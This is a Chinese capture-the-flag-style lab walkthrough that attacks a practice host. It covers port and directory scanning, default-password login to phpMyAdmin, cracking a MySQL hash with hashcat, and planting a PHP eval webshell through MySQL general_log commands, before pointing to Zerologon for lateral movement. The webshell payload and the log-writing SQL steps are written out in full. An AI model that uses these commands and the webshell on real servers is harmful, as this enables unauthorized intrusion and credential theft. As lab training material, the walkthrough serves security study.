内网渗透-项目1二层网络
信息搜集
端口扫描
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -p- 10.8.0.101 --min-rate=1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-17 21:32 CST
Nmap scan report for 10.8.0.101
Host is up (0.00015s latency).
All 65535 scanned ports on 10.8.0.101 are in ignored states.
Not shown: 65535 filtered tcp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 109.63 seconds
端口扫描没有扫描结果
目录扫描
直接使用dirsearch进行目录扫描:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# dirsearch -u http://10.10.0.101/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/Downloads/reports/http_10.10.0.101/__25-04-17_21-43-18.txt
Target: http://10.10.0.101/
[21:43:18] Starting:
[21:43:25] 403 - 211B - /%3f/
[21:43:25] 403 - 215B - /%C0%AE%C0%AE%C0%AF
[21:43:25] 403 - 210B - /%ff
[21:43:31] 403 - 220B - /.ht_wsr.txt
[21:43:31] 403 - 223B - /.htaccess.bak1
[21:43:31] 403 - 225B - /.htaccess.sample
[21:43:31] 403 - 223B - /.htaccess.orig
[21:43:31] 403 - 223B - /.htaccess.save
[21:43:31] 403 - 223B - /.htaccess_orig
[21:43:31] 403 - 224B - /.htaccess_extra
[21:43:31] 403 - 221B - /.htaccessBAK
[21:43:31] 403 - 222B - /.htaccessOLD2
[21:43:31] 403 - 221B - /.htaccessOLD
[21:43:31] 403 - 221B - /.htaccess_sc
[21:43:31] 403 - 213B - /.htm
[21:43:31] 403 - 223B - /.htpasswd_test
[21:43:31] 403 - 219B - /.htpasswds
[21:43:31] 403 - 214B - /.html
[21:43:31] 403 - 220B - /.httr-oauth
[21:44:45] 403 - 225B - /index.php::$DATA
[21:45:08] 301 - 238B - /phpMyAdmin -> http://10.10.0.101/phpMyAdmin/
[21:45:08] 301 - 238B - /phpmyadmin -> http://10.10.0.101/phpmyadmin/
[21:45:09] 200 - 71KB - /phpinfo.php
[21:45:11] 200 - 2KB - /phpmyadmin/README
[21:45:11] 200 - 4KB - /phpMyAdmin/
[21:45:11] 200 - 4KB - /phpmyadmin/index.php
[21:45:11] 200 - 4KB - /phpMyAdmin/index.php
[21:45:11] 200 - 4KB - /phpMyadmin/
[21:45:11] 200 - 4KB - /phpmyadmin/
[21:45:11] 200 - 4KB - /phpmyAdmin/
[21:45:11] 200 - 32KB - /phpmyadmin/ChangeLog
[21:45:38] 403 - 225B - /Trace.axd::$DATA
[21:45:46] 403 - 226B - /web.config::$DATA
Task Completed
可以看到有默认页面以及mysql远程管理工具相关页面:
-
靶场默认页面:
经过测试,下面的mysql连接状态测试中使用默认口令:root:root显示成功:
但后续尝试远程连接,失败,应该是只能本地访问
下面的命令测试没有什么作用,只能测试哪些命令可用,但无法执行。
-
mysql管理页:/phpMyAdmin
使用前面得到的凭证,成功登入:
-
管理平台版本:/phpmyadmin/ChangeLog
可以看到当前的版本信息
数据库信息泄露
yxcms管理员密码爆破
通过查找数据,发现有一个newyxcms数据库中存在yx_admin,存在一个admin的账户信息:
通过识别,发现是md5编码:
彩虹表爆破值:
得到密码明文:949ba59abbe56e05
本地root用户密码爆破
在mysql库下有一个user表,表里面有一个本地用户凭据信息:
通过识别,发现是 MySQL4.1/MySQL5 类型:
通过hashcat进行爆破,在hashcat中 MySQL4.1/MySQL5 类型为300:
PS>.\hashcat.exe '81F5E21E35407D884A6CD4A731AEBFB6AF209E1B' -m 300 -a 0 D:\SafetyTools\FUZZ工具包\字典\rockyou.txt
...
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 140 MB
Dictionary cache hit:
* Filename..: D:\SafetyTools\FUZZ工具包\字典\rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
81f5e21e35407d884a6cd4a731aebfb6af209e1b:root
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 300 (MySQL4.1/MySQL5)
Hash.Target......: 81f5e21e35407d884a6cd4a731aebfb6af209e1b
Time.Started.....: Thu Apr 17 22:15:49 2025 (1 sec)
Time.Estimated...: Thu Apr 17 22:15:50 2025 (0 secs)
...
Started: Thu Apr 17 22:15:16 2025
Stopped: Thu Apr 17 22:15:51 2025
爆出密码明文为:root
getshell
phpMyAdmin写shell
条件
- 拥有root权限
- 知道网站的绝对路径:在靶场首页有写:C:/phpStudy/WWW
通过日志写shell
1、查看当前日志文件:
SHOW VARIABLES LIKE 'general%';
2、开启日志记录:
set global general_log = "ON";
3、更改日志文件路径:
set global general_log_file='C:\\phpStudy\\WWW\\revshell.php';
4、往日志文件里写入一句话木马
select '<?php @eval($_POST[cmd]);?>';
上线shell
使用蚁剑连接shell:
成功连接~
内网横向
直接复现漏洞:zerologon
参考文档:zerologon复现
浙公网安备 33010602011771号